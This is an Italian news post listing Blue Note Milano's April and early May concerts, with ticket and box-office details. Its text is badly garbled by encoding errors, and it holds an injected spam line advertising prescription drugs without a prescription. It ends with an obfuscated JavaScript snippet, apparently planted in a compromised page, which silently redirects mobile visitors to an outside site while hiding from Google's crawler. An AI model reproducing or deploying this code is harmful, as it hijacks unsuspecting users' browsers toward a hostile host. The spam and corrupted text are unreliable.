News

Blue Note Milano: la programmazione di aprile ed i primi concerti di maggio

Aprile e maggio saranno due mesi in compagnia di grandi artisti al BLUE NOTE MILANO (Via Borsieri, 37), la��unica sede europea dello storico jazz club di New York. Il locale di punta della scena milanese ospiterA� diversi artisti italiani e internazionali pronti a coinvolgere il pubblico in concerti irrinunciabili, tra jazz, swing, soul e pop e, dopo il grande successo ottenuto nel mese di marzo, ospiterA� ancora la Blue Vinyl Nite, serata dedicata interamente al vinile.A�

Il mese di Aprile si aprirA� con JACKY TERRASSON, uno dei talenti piA? acclamati venuti alla ribalta sulla scena jazz internazionale a cavallo tra anni a��80 e a��90, per la��occasione live in Trio (3 aprile) e proseguirA� con il live della cantautrice LUCY WOODWARD che presenterA� il suo ultimo disco da solista a�?Til They Bang On The Doora�? (4 aprile), il grande ritorno della NOTTE DEI PUBBLIVORI, tre serate dedicate al mondo della pubblicitA� in cui verranno presentate le novitA� piA? elettrizzanti della produzione pubblicitaria degli ultimi anni senza tralasciare i grandi classici (5, 6 e 7 aprile); la vocalitA� ludica ed evocativa di CLAUDIA CANTISANI (8 aprile); Il quintetto MONK KEYS di Claudio Angeleri che renderA� omaggio alla musica del grande pianista e compositoreA�THELONIOUS MONK, attraverso una rilettura rigorosa ma al tempo stesso moderna e creativa del suo straordinario repertorio (10 aprile); la��IGUAZA� ACOUSTIC TRIO composto da Fabio Gianni al piano, Marco Mistrangelo al basso e Alex Battini de Barreiro alla batteria e alle percussioni, accompagnati dalla straordinaria presenza artistica della special guest Paola Folli. Il trio proporrA� un live caratterizzato da energiche sonoritA� afrocubane, contaminazioni jazz, fino ad arrangiamenti personali di cover che fanno omaggio a grandi personalitA� del latin jazz internazionale (11 aprile); il compositore e pianista jazz KLAUS BELLAVITIS che ripercorrendo mezzo secolo di carriera musicale, presenterA� live i propri successi in un percorso popolato di luci e ombre e narrato con il cuore (12 aprile); uno dei piA? autorevoli trombettisti jazz al mondo ROY HARGROVE, un artista che attraverso i suoi progetti si A? creato una invidiabile reputazione tra addetti ai lavori e pubblico, ritagliandosi cosA� un ruolo di primo piano tra i grandi maestri del jazz contemporaneo (13 aprile); sarA� poi la volta di un altro grande trombettista: FLAVIO BOLTRO alla guida del suo BBB TRIO (14 aprile); la giovane compositrice FEDERICA FORNABAIO, presenta in uno speciale concerto il suo nuovo album che vede a�� oltre alle sue nuove composizioni a��A� la presenza di un brano del compositore RyA�ichi Sakamoto, a�?Asiencea�?, selezionato dal maestro giapponese espressamente per lei per questo progetto (15 aprile); E.J. STRICKLAND, uno dei batteristi piA? eclettici e richiesti della sua generazione, spesso in tandem col fratello gemello Marcus; E.J. A? un leader e compositore di tutto rispetto, e la��ultimo album a�?The Undying Spirita�? ne dA� una splendida conferma (17 aprile); la��eclettico sassofonista TINO TRACANNA con il suo trio TRE, affiancato per la��occasione da Roberto Cecchetto (18 aprile); iTALIAN dIRE sTRAITS, la tribute band per eccellenza dei Dire Straits torna sul prestigioso palco del jazz club milanese per un imperdibile concerto (19 aprile); JOYCE ELAINE YUILLE, personalitA� raffinata e comunicativa, ritorna sul palco del Blue Note con il suo fidatissimo gruppo Jazz Inc., un collettivo di musicisti che negli anni ha annoverato collaborazioni con eccellenze del panorama musicale italiano e internazionale. Presenteranno un repertorio emozionante e vario di brani inediti e alcuni classici jazz arrangiati con venature soul, blues e anche un pizzico di funk per esaltare la��interplay tra i musicisti e la voce sofisticata ed energica di Joyce (20 aprile); dopo il grande successo dello scorso mese, in occasione del Record Store Day, ritorna la BLUE VINYL NITE.

baclofen buy online, Zoloft withoutprescription.
Una serata insieme ad uno tra i piA? importanti DJ italiani, CLAUDIO COCCOLUTO e la sua autentica devozione per la musica, una passione viscerale iniziata negli anni a�?80 e proseguita fino ai giorni nostri alla��insegna della��eclettismo e della��attenzione verso i nuovi stimoli che lo proiettano costantemente verso il futuro (21 aprile); ACA SECA TRIO, il vero e proprio ciclone nella scena musicale argentina si prepara a sbarcare in Europa. I tre ragazzi mescolano raffinate melodie ad armonie jazz creando delle vere e proprie pillole musicali assolutamente originali (22 aprile); I TOWER OF POWER, dagli anni Settanta a oggi hanno portato il funk e il soul a livelli di perfezione. La band A? composta da Emilio Castillo voce e sax tenore, Stephen a�?Doca�? Kupka al sax baritono, Marc Van Wageningen al basso, David Garibaldi alla batteria, Marcus Scott voce, Roger Smith voce e tastiere, Tom E. Politzer al sax tenore, sax alto, flauto e al clarinetto, Adolfo Acosta alla tromba e al flicorno, Sal Cracchilol alla tromba e Jerry Cortez voce e chitarra (24 e 25 aprile); sarA� poi protagonista la tromba di TOM HARRELL, tra le piA? rappresentative e ammirate del jazz degli ultimi decenni (26 aprile); torna a grande richiesta anche a�?Swing with Stinga�?, il nuovo progetto della NICK THE NIGHTFLY ORCHESTRA dedicato alla musica di Sting (27 e 28 aprile) e per concludere il mese il quartetto di star del jazz italiano ROSARIO GIULIANI QUARTET, composto da Rosario Giuliani al sax, Alessandro LanzoniA� al piano, Luca FattoriniA� al contrabbasso e Fabrizio Sferra alla batteria, che presenterA� il progetto discografico a�?The Hidden Sidea�? (29 aprile) in occasione della��International Jazz Day.


A maggio tra i tanti nomi che si alterneranno sul palco, sono giA� confermati: JOHN SCOFIELD
, una��icona mondiale della chitarra jazz, che presenterA� il progetto di successo a�?Country for Old Mena�? (3 maggio); il celebre compositore brasiliano IVAN LINS (4 maggio); la MONDAY ORCHESTRA, composta da 18 musicisti e diretta da Luca Missiti, presenterA� live il disco a�?Never Alonea�?, in questa occasione insieme allo special guest Daniele Scannapieco. A dieci anni dalla scomparsa di Brecker, la Monday Orchestra ha infatti deciso di celebrarne la musica attraverso la registrazione di un disco composto da arrangiamenti originali per Big Band di alcune sue composizioni (6 maggio); il nuovo progetto della��esplosivo sassofonista BILL EVANS, che si esibirA� con un super gruppo formato da Ulf Wakenius alla chitarra, Gary Grainger al basso e Dennis Chambers alla batteria (8 e 9 maggio); il sodalizio inscindibile della voce e della chitarra di TUCK & PATTI (10 e 11 maggio); torna poi sul palco del Blue Note per due date il piA? celebre quartetto vocale della storia THE MANHATTAN TRANSFER (12 e 13 maggio); il trombonista, icona del funk, FRED WESLEY (15 maggio); il cantautore BUNGARO, reduce dal recente successo al Festival di Sanremo presenterA� la��album a�?Maredentro il Viaggioa�? (17 maggio); una delle voci emergenti piA? interessanti della scena jazz, CA�CILE MCLORIN SALVANT, vincitrice del Grammy Award 2014 come miglior cantante jazz. In questi anni ha saputo immergersi fino alle piA? profonde radici di questa musica e piA? di qualsiasi cantante della sua generazione (1989) conosce le sonoritA� e gli stili del jazz moderno e padroneggia completamente la vocalitA� del blues classico assieme a quella della piA? remota tradizione americana (18 e 19 maggio); il sensazionale sassofonista, KENNY GARRETT, considerato uno dei migliori interpreti del post-bop. Dalla��inizio della sua carriera ha inciso diversi album come leader, ha avuto numerose nomination al Grammy e ha suonato e inciso con grandi personaggi del jazz come Miles Davis, Freddie Hubbard, Woody Shaw, Brian Blade, Marcus Miller, Herbie Hancock e molti altri (26 maggio).

INFO:
Ogni sera, salvo lo spettacolo unico della domenica ed eventuali variazioni di calendario tempestivamente segnalate sul sito internet (www.bluenotemilano.com), al Blue Note Milano si tengono due spettacoli (dal martedA� al giovedA� con inizio alle ore 21.00 e alle ore 23.00 mentre il venerdA� e il sabato alle ore 21.00 e alle ore 23.30).A�

I biglietti per i concerti al Blue Note si possono acquistare collegandosi al sito internet www.bluenotemilano.com, o al sito www.vivaticket.it; chiamando la��infoline del Blue Note 02 69016888, oppure direttamente presso il box office del locale. La��orario della��infoline e del Box Office (via Borsieri, 37) A? il seguente: LunedA� dalle 12.00 alle 19.00 e MartedA�-Sabato dalle 12.00 alle 22.00.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}